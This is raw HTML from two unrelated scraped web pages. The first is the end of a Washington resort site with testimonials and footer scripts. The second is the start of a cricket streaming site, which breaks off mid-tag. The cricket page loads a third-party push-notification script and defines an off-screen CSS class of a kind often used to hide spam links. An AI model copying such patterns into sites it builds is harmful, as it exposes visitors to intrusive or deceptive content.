avia-testimonial-row-1 ' itemscope="itemscope" itemtype="https://schema.org/Person" ><div class='avia-testimonial_inner'><div class='avia-testimonial-content ' itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><p>We recently chose to have our entire family come to Wapato Point for a reunion. It was so fun we have decided to do it each year. Thank you for making it the perfect experience for the entire family. The staff was GREAT!</p> </div><div class='avia-testimonial-meta'><div class='avia-testimonial-arrow-wrap'><div class='avia-arrow'></div></div><div class='avia-testimonial-meta-mini'><strong class='avia-testimonial-name' itemprop="name" >SUSAN B</strong></div></div></div></div> <div class='avia-testimonial av_one_half flex_column no_margin avia-testimonial-row-1 ' itemscope="itemscope" itemtype="https://schema.org/Person" ><div class='avia-testimonial_inner'><div class='avia-testimonial-content ' itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><p>We had an amazing time. Sad to say we never left the property, but I never felt the need. We were having so much fun we simply forgot to go anywhere. Next time we are planning to visit some of the great Chelan wineries.</p> </div><div class='avia-testimonial-meta'><div class='avia-testimonial-arrow-wrap'><div class='avia-arrow'></div></div><div class='avia-testimonial-meta-mini'><strong class='avia-testimonial-name' itemprop="name" >NICOLE C</strong></div></div></div></div> </section><div class='avia-slideshow-arrows avia-slideshow-controls' ><a href='#prev' class='prev-slide' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello'>Previous</a><a href='#next' class='next-slide' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello'>Next</a></div></div></div> </div></div></div><!-- close content main div --> <!-- section close by builder template --> </div><!--end builder template--></div><!-- close default .container_wrap element --> <div class='container_wrap footer_color' id='footer'> <div class='container'> <div class='flex_column av_one_third first el_before_av_one_third'><section id="text-3" class="widget clearfix widget_text"><h3 class="widgettitle">WAPATO POINT</h3> <div class="textwidget"><p><span style="color: #f2f2f2;"><span class="av_font_icon avia_animate_when_visible avia-icon-animate av-icon-style- avia-icon-pos-left " style="color:#f7f7f7; border-color:#f7f7f7;"><span class='av-icon-char' style='font-size:20px;line-height:20px;' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello' ></span></span></span></p> <p><span style="color: #f2f2f2;">EMAIL: <a href="mailto:[email protected]"onMouseOver="this.style.color='#164258'" onMouseOut="this.style.color='#fff'">[email protected]</a></span></p> <p><span style="color: #f2f2f2;"><span class="av_font_icon avia_animate_when_visible avia-icon-animate av-icon-style- avia-icon-pos-left " style="color:#f7f7f7; border-color:#f7f7f7;"><span class='av-icon-char' style='font-size:20px;line-height:20px;' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello' ></span></span></span></p> <p><span style="color: #f2f2f2;">PHONE: 1-509-687-9511</span></p> <p><span style="color: #f2f2f2;"><span class="av_font_icon avia_animate_when_visible avia-icon-animate av-icon-style- avia-icon-pos-left " style="color:#f7f7f7; border-color:#f7f7f7;"><span class='av-icon-char' style='font-size:20px;line-height:20px;' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello' ></span></span> RESERVATIONS: 1-888-768-9511</span></p> <p><span style="color: #f2f2f2;"><span class="av_font_icon avia_animate_when_visible avia-icon-animate av-icon-style- avia-icon-pos-left " style="color:#f7f7f7; border-color:#f7f7f7;"><span class='av-icon-char' style='font-size:20px;line-height:20px;' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello' ></span></span></span></p> <p><span style="color: #f2f2f2;">ADDRESS: 1 Wapato Point Way, Manson WA</span></p> </div> <span class="seperator extralight-border"></span></section></div><div class='flex_column av_one_third el_after_av_one_third el_before_av_one_third '><section id="text-4" class="widget clearfix widget_text"><h3 class="widgettitle">JOIN US</h3> <div class="textwidget"><span class="av_font_icon avia_animate_when_visible avia-icon-animate av-icon-style- avia-icon-pos-left " style="color:#1b6196; border-color:#1b6196;"><a href='http://www.facebook.com/WapatoPointResort' target="_blank" class='av-icon-char' style='font-size:60px;line-height:60px;' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello' ></a></span> <span class="av_font_icon avia_animate_when_visible avia-icon-animate av-icon-style- avia-icon-pos-left " style="color:#ca316d; border-color:#ca316d;"><a href='http://www.flickr.com/photos/118841073@N04/' target="_blank" class='av-icon-char' style='font-size:60px;line-height:60px;' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello' ></a></span> <span class="av_font_icon avia_animate_when_visible avia-icon-animate av-icon-style- avia-icon-pos-left " style="color:#7dccff; border-color:#7dccff;"><a href='http://twitter.com/WapatoPtResort' target="_blank" class='av-icon-char' style='font-size:60px;line-height:60px;' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello' ></a></span></div> <span class="seperator extralight-border"></span></section></div><div class='flex_column av_one_third el_after_av_one_third el_before_av_one_third '><section id="avia_fb_likebox-3" class="widget clearfix avia_fb_likebox"><h3 class="widgettitle">FACEBOOK</h3><div class='av_facebook_widget_wrap ' ><div class="fb-page" data-width="500" data-href="https://www.facebook.com/WapatoPointResort/" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true" data-show-posts="false"><div class="fb-xfbml-parse-ignore"></div></div></div><span class="seperator extralight-border"></span></section></div> </div> <!-- ####### END FOOTER CONTAINER ####### --> </div> <footer class='container_wrap socket_color' id='socket' role="contentinfo" itemscope="itemscope" itemtype="https://schema.org/WPFooter" > <div class='container'> <span class='copyright'>Site by <a href="http://www.sungraphic.com">SUNGRAPHIC</a> </span> </div> <!-- ####### END SOCKET CONTAINER ####### --> </footer> <!-- end main --> </div> <!-- end wrap_all --></div> <a href='#top' title='Scroll to top' id='scroll-top-link' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello'><span class="avia_hidden_link_text">Scroll to top</span></a> <div id="fb-root"></div> <script type='text/javascript'> /* <![CDATA[ */ var avia_framework_globals = avia_framework_globals || {}; avia_framework_globals.frameworkUrl = 'https://wapatopoint.com/wp-content/themes/enfold/framework/'; avia_framework_globals.installedAt = 'https://wapatopoint.com/wp-content/themes/enfold/'; avia_framework_globals.ajaxurl = 'https://wapatopoint.com/wp-admin/admin-ajax.php'; /* ]]> */ </script> <script type="text/javascript"> function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); } </script> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.7"; fjs.parentNode.insertBefore(js, fjs); }(document, "script", "facebook-jssdk"));</script><script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/js/avia.js?ver=4.5.2'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/js/shortcodes.js?ver=4.5.2'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/isotope.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow-video.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.js?ver=5.1.1'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/js/aviapopup/jquery.magnific-popup.min.js?ver=4.5.2'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/js/avia-snippet-lightbox.js?ver=4.5.2'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/js/avia-snippet-megamenu.js?ver=4.5.2'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/js/avia-snippet-sticky-header.js?ver=4.5.2'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/js/avia-snippet-widget.js?ver=4.5.2'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-content/themes/enfold/framework/js/conditional_load/avia_google_maps_front.js?ver=4.5.2'></script> <script type='text/javascript' src='https://wapatopoint.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script> if(document.cookie.match(/aviaPrivacyGoogleTrackingDisabled/)){ window['ga-disable-UA-125043084-1'] = true; } </script><!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-125043084-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-125043084-1'); </script> </body> </html>
0
<!DOCTYPE html> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame --> <!--[if IE ]> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <![endif]--> <link rel="profile" href="https://gmpg.org/xfn/11" /> <title>Mobilecric.Com - Watch Live Cricket Streaming on Mobile phone</title> <!--iOS/android/handheld specific --> <link rel="apple-touch-icon" href="https://www.mobilecric.com/wp-content/themes/theme/apple-touch-icon.png" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <link rel="pingback" href="https://www.mobilecric.com/xmlrpc.php" /> <!-- This site is optimized with the Yoast SEO plugin v11.1.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="IPL 2019 and Pak Vs Aus live streaming on your mobile phone. Watch free live cricket on iPhone, iPad and Android on Mobilecric.Com."/> <link rel="canonical" href="https://www.mobilecric.com/" /> <link rel="next" href="https://www.mobilecric.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Mobilecric.Com - Watch Live Cricket Streaming on Mobile phone" /> <meta property="og:description" content="IPL 2019 and Pak Vs Aus live streaming on your mobile phone. Watch free live cricket on iPhone, iPad and Android on Mobilecric.Com." /> <meta property="og:url" content="https://www.mobilecric.com/" /> <meta property="og:site_name" content="Mobilecric.Com" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="IPL 2019 and Pak Vs Aus live streaming on your mobile phone. Watch free live cricket on iPhone, iPad and Android on Mobilecric.Com." /> <meta name="twitter:title" content="Mobilecric.Com - Watch Live Cricket Streaming on Mobile phone" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.mobilecric.com/#organization","name":"Mobilecric.Com","url":"https://www.mobilecric.com/","sameAs":[]},{"@type":"WebSite","@id":"https://www.mobilecric.com/#website","url":"https://www.mobilecric.com/","name":"Mobilecric.Com","publisher":{"@id":"https://www.mobilecric.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.mobilecric.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.mobilecric.com/#webpage","url":"https://www.mobilecric.com/","inLanguage":"en-US","name":"Mobilecric.Com - Watch Live Cricket Streaming on Mobile phone","isPartOf":{"@id":"https://www.mobilecric.com/#website"},"about":{"@id":"https://www.mobilecric.com/#organization"},"description":"IPL 2019 and Pak Vs Aus live streaming on your mobile phone. Watch free live cricket on iPhone, iPad and Android on Mobilecric.Com."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.mobilecric.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Mobilecric.Com &raquo; Feed" href="https://www.mobilecric.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Mobilecric.Com &raquo; Comments Feed" href="https://www.mobilecric.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.mobilecric.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.mobilecric.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='videojs-css' href='https://www.mobilecric.com/wp-content/plugins/videojs-html5-player/videojs/video-js.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='fontawesome-css' href='https://www.mobilecric.com/wp-content/themes/theme/css/font-awesome.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='stylesheet-css' href='https://www.mobilecric.com/wp-content/themes/theme/style.css?ver=5.2' type='text/css' media='all' /> <style id='stylesheet-inline-css' type='text/css'> body {background-color:#ffffff; } body {background-image: url(https://www.mobilecric.com/wp-content/themes/theme/images/nobg.png);} .main-navigation #navigation li a:hover, .main-navigation #navigation .current-menu-item > a, .main-navigation #navigation .sfHover > a, .main-navigation #navigation ul .current-menu-item:before, .main-navigation #navigation ul li:hover > a, .main-navigation #navigation ul li:hover:before, .cnumber, .postauthor h5, .copyrights a, .textwidget a, #logo a, .pnavigation2 a, .sidebar.c-4-12 a, .copyrights a:hover, footer .widget li a:hover, .reply a, .title a:hover, .post-info a:hover, .readMore a:hover, a { color:#2DB2EB; } .sidebar .popular-posts li:hover, .popular-posts .pcomments, #commentform input#submit:hover, .contactform #submit:hover, .mts-subscribe input[type='submit']:hover, #move-to-top:hover, .secondary-navigation #navigation ul .current-menu-item > a, .secondary-navigation #navigation ul li:hover, .tagcloud a:hover, .woocommerce a.button, .woocommerce-page a.button, .woocommerce button.button, .woocommerce-page button.button, .woocommerce input.button, .woocommerce-page input.button, .woocommerce #respond input#submit, .woocommerce-page #respond input#submit, .woocommerce #content input.button, .woocommerce-page #content input.button, .woocommerce .bypostauthor:after, #searchsubmit, .woocommerce nav.woocommerce-pagination ul li span.current, .woocommerce-page nav.woocommerce-pagination ul li span.current, .woocommerce #content nav.woocommerce-pagination ul li span.current, .woocommerce-page #content nav.woocommerce-pagination ul li span.current, .woocommerce nav.woocommerce-pagination ul li a:hover, .woocommerce-page nav.woocommerce-pagination ul li a:hover, .woocommerce #content nav.woocommerce-pagination ul li a:hover, .woocommerce-page #content nav.woocommerce-pagination ul li a:hover, .woocommerce nav.woocommerce-pagination ul li a:focus, .woocommerce-page nav.woocommerce-pagination ul li a:focus, .woocommerce #content nav.woocommerce-pagination ul li a:focus, .woocommerce-page #content nav.woocommerce-pagination ul li a:focus, .woocommerce a.button, .woocommerce-page a.button, .woocommerce button.button, .woocommerce-page button.button, .woocommerce input.button, .woocommerce-page input.button, .woocommerce #respond input#submit, .woocommerce-page #respond input#submit, .woocommerce #content input.button, .woocommerce-page #content input.button, .post-number { background-color:#2DB2EB; color: #fff!important; } .currenttext, .pagination a:hover, .single .pagination a:hover .currenttext { background-color:#2DB2EB; } .flex-control-thumbs .flex-active{ border-top:3px solid #2DB2EB;} .secondary-navigation #navigation ul li:hover, .secondary-navigation #navigation ul li:hover + li, #navigation .mts-cart li:hover + li { border-color: #2DB2EB; } .shareit, .shareit.top { top: 275px; left: auto; z-index: 0; margin: 0 0 0 -123px; width: 90px; position: fixed; overflow: hidden; padding: 5px; border:none; border-right: 0;} .share-item {margin: 2px;} .bypostauthor {padding: 3%!important; background: #FAFAFA; width: 94%!important;} .bypostauthor:after { content: "Author"; position: absolute; right: -1px; top: -1px; padding: 1px 10px; background: #818181; color: #FFF; } </style> <link rel='stylesheet' id='responsive-css' href='https://www.mobilecric.com/wp-content/themes/theme/css/responsive.css?ver=5.2' type='text/css' media='all' /> <script type='text/javascript' src='https://www.mobilecric.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.mobilecric.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.mobilecric.com/wp-content/themes/theme/js/customscript.js?ver=5.2'></script> <script type='text/javascript' src='https://www.mobilecric.com/wp-content/themes/theme/js/modernizr.min.js?ver=5.2'></script> <link rel='https://api.w.org/' href='https://www.mobilecric.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.mobilecric.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.mobilecric.com/wp-includes/wlwmanifest.xml" /> <!--Theme by MyThemeShop.com--> <script> var isDesktop = { Windows: function() { return navigator.platform.match('Win32|Win16|Win64|WinCE|Windows'); }, Mac: function() { return navigator.platform.match('MacIntel|Macintosh|MacPPC|Mac68K'); }, any: function() { return (isDesktop.Windows() || isDesktop.Mac()); } }; if (isDesktop.any()){ window.location='http://web.mobilecric.com'; } </script> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-96988015-2"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-96988015-2'); </script> <script type="text/javascript">   window._taboola = window._taboola || [];   _taboola.push({article:'auto'});   !function (e, f, u, i) {     if (!document.getElementById(i)){       e.async = 1;       e.src = u;       e.id = i;       f.parentNode.insertBefore(e, f);     }   }(document.createElement('script'),   document.getElementsByTagName('script')[0],   '//cdn.taboola.com/libtrc/mobilecric/loader.js',   'tb_loader_script');   if(window.performance && typeof window.performance.mark == 'function')     {window.performance.mark('tbl_ic');} </script> <script src="//pushmejs.com/ntfc.php?p=2518113" data-cfasync="false" async></script> <!-- This site is embedding videos using the Videojs HTML5 Player plugin v1.1.3 - http://wphowto.net/videojs-html5-player-for-wordpress-757 --><link href="https://fonts.googleapis.com/css?family=Bree+Serif:400|Open+Sans" rel="stylesheet" type="text/css"> <style type="text/css"> #navigation a{ font-family: "Bree Serif";font-weight: 400;font-size: 14px;color: #FFFFFF; } h1{ font-family: "Bree Serif";font-weight: 400;font-size: 28px;color: #222222; } h2{ font-family: "Bree Serif";font-weight: 400;font-size: 24px;color: #222222; } h3{ font-family: "Bree Serif";font-weight: 400;font-size: 22px;color: #222222; } h4{ font-family: "Bree Serif";font-weight: 400;font-size: 20px;color: #222222; } h5{ font-family: "Bree Serif";font-weight: 400;font-size: 18px;color: #222222; } h6{ font-family: "Bree Serif";font-weight: 400;font-size: 16px;color: #222222; } body{ font-family: "Open Sans";font-weight: ;font-size: 14px;color: #666666; } </style> <style type="text/css">.ieExternalVar { position:absolute; left: -58in; top: -21in; }</style><link rel="icon" href="https://www.mobilecric.com/wp-content/uploads/2019/03/cropped-app_logo-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.mobilecric.com/wp-content/uploads/2019/03/cropped-app_logo-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.mobilecric.com/wp-content/uploads/2019/03/cropped-app_logo-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.mobilecric.com/wp-content/uploads/2019/03/cropped-app_logo-270x270.png" /> </head> <body id ="blog" class="home blog main" itemscope itemtype="http://schema.org/WebPage"> <div class="main-container"> <header class="main-header"> <div class="container"> <div id="header"> <div class="logo-wrap"> <h1 id="logo" class="text-logo"> <a href="https://www.mobilecric.com">Mobilecric.Com</a> </h1><!-- END #logo --> <div class="site-description"> Your ultimate source to cricket news </div> </div> <div class="secondary-navigation"> <nav id="navigation" class="clearfix"> <ul id="menu-navigation" class="menu clearfix"><li id="menu-item-4" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-4"><a href="http://www.mobilecric.com" aria-current="page">Home</a></li> <li id="menu-item-16" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16"><a href="https://www.mobilecric.com/category/odi-news/">ODI News</a></li> <li id="menu-item-17" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17"><a href="https://www.mobilecric.com/category/test-news/">Test News</a></li> <li id="menu-item-18" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18"><a href="https://www.mobilecric.com/category/twenty20-news/">Twenty20 News</a></li> <li id="menu-item-15" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15"><a href="https://www.mobilecric.com/category/leagues-news/">Domestic Leagues News</a></li> </ul> <a href="#" id="pull-primary">Menu</a> </nav> </div> </div><!--#header--> </div><!--.container--> </header> <div id="page"> <div class="article"> <div id="content_box"> <div class="viewstyle"> <span class="viewtext">Show Posts in</span> <div class="viewsbox"> <div id="list" class="active"><a><i class="icon-list"></i> List View</a></div> <div id="grid"><a><i class="icon-th"></i> Grid View</a></div> </div> <div style="clear:both;"></div> </div> <article class="latestPost excerpt "> <header> <a href="https://www.mobilecric.com/england-vs-pakistan-2019-odi-series-statistical-overview/" title="England vs Pakistan 2019 ODI Series: Statistical Overview" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-200x200.jpg" class="attachment-featured size-featured wp-post-image" alt="England vs Pakistan 2019 ODI Series, England vs Pakistan 2019 ODI series: Statistical Overview" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-200x200.jpg 200w, https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2019/05/Pak-vs-Eng-2019-696x418-80x80.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/england-vs-pakistan-2019-odi-series-statistical-overview/" title="England vs Pakistan 2019 ODI Series: Statistical Overview">England vs Pakistan 2019 ODI Series: Statistical Overview</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/odi-news/" rel="nofollow">ODI News</a></span> </div> </header> </article><!--.post excerpt--> <article class="latestPost excerpt "> <header> <a href="https://www.mobilecric.com/england-announce-odi-squad-for-pakistan-series/" title="England announce ODI squad for Pakistan series" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2017/12/i-200x200.jpg" class="attachment-featured size-featured wp-post-image" alt="Junaid Khan-ruled-out-of-New Zealand-tour-2018-mobilecric.com" title="" srcset="https://www.mobilecric.com/wp-content/uploads/2017/12/i-200x200.jpg 200w, https://www.mobilecric.com/wp-content/uploads/2017/12/i-150x150.jpg 150w, https://www.mobilecric.com/wp-content/uploads/2017/12/i-80x80.jpg 80w" sizes="(max-width: 200px) 100vw, 200px" /></div> </a> <h2 class="title front-view-title"><a href="https://www.mobilecric.com/england-announce-odi-squad-for-pakistan-series/" title="England announce ODI squad for Pakistan series">England announce ODI squad for Pakistan series</a></h2> <div class="post-info"> <span class="thecategory"><i class="icon-tags"></i> <a href="https://www.mobilecric.com/category/odi-news/" rel="nofollow">ODI News</a></span> </div> </header> </article><!--.post excerpt--> <article class="latestPost excerpt last"> <header> <a href="https://www.mobilecric.com/2019-ireland-tri-nation-series-statistical-overview/" title="2019 Ireland Tri-Nation Series: Statistical Overview" rel="nofollow" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="200" height="200" src="https://www.mobilecric.com/wp-content/uploads/2019/05/04B538C4-48DB-43B5-94A4-921B1F9FCC6D-200x200.jpg" class="attachment-featured size-featured wp-post-image" alt="2019 Ireland 